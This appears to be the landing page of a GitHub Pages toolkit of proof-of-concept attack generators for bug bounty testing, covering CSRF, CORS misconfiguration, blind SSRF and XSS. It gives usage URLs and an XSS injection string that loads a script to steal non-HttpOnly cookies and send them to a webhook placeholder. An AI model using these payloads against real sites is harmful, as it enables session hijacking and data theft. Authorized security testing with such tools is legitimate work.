ETHICAL SECURITY PoC HUB

Private Research & Authorized Testing Tools

**CRITICAL NOTE:** All testing conducted is **strictly authorized** and **scoped** for Bug Bounty Programs or legal Pen-Tests. **Do not use these tools on unauthorized targets.**

Base Attacker URL:

This URL is the base for all your PoC links. Replace `yourusername.github.io` with the domain from the code below.

Available PoC Generators

1. Cross-Site Request Forgery (CSRF)

Launch: CSRF Attack Generator (POST)
**Usage URL:** [BASE_URL]csrf_attack.html?url=VULNERABLE_ACTION_URL¶m1=value1¶m2=value2...
**Goal:** Force a POST request (e.g., account settings change) using the victim's session.

2. Cross-Origin Resource Sharing (CORS)

Launch: CORS Misconfiguration Tester
**Usage URL:** [BASE_URL]cors_test.html?target=VULNERABLE_ENDPOINT_URL
**Goal:** Attempt to read authenticated data cross-origin (requires `credentials: 'include'`).

3. Server-Side Request Forgery (SSRF - Blind OOB)

Launch: SSRF Out-of-Band Trigger (HTML/JS Redirect)
**Usage URL:** [BASE_URL]ssrf_trigger.html?log=YOUR_WEBHOOK_URL
**Injection String:** Inject the full URL above into the target's vulnerable URL parameter (e.g., image loading, file fetching).

4. Cross-Site Scripting (XSS - Cookie Exfiltration)

View: XSS Exfiltration Payload (`xss_payload.js`)
**Injection String:** <script src="?log=YOUR_WEBHOOK_URL"></script>
**Goal:** Load the external JS file (`xss_payload.js`) to steal non-HttpOnly cookies and send them to your webhook.

Logging Endpoint Requirement

Since this repository is static (GitHub Pages), data exfiltration PoCs (XSS, SSRF) require a third-party logging service. Use services like webhook.site or Beeceptor for your WEBHOOK_URL placeholder.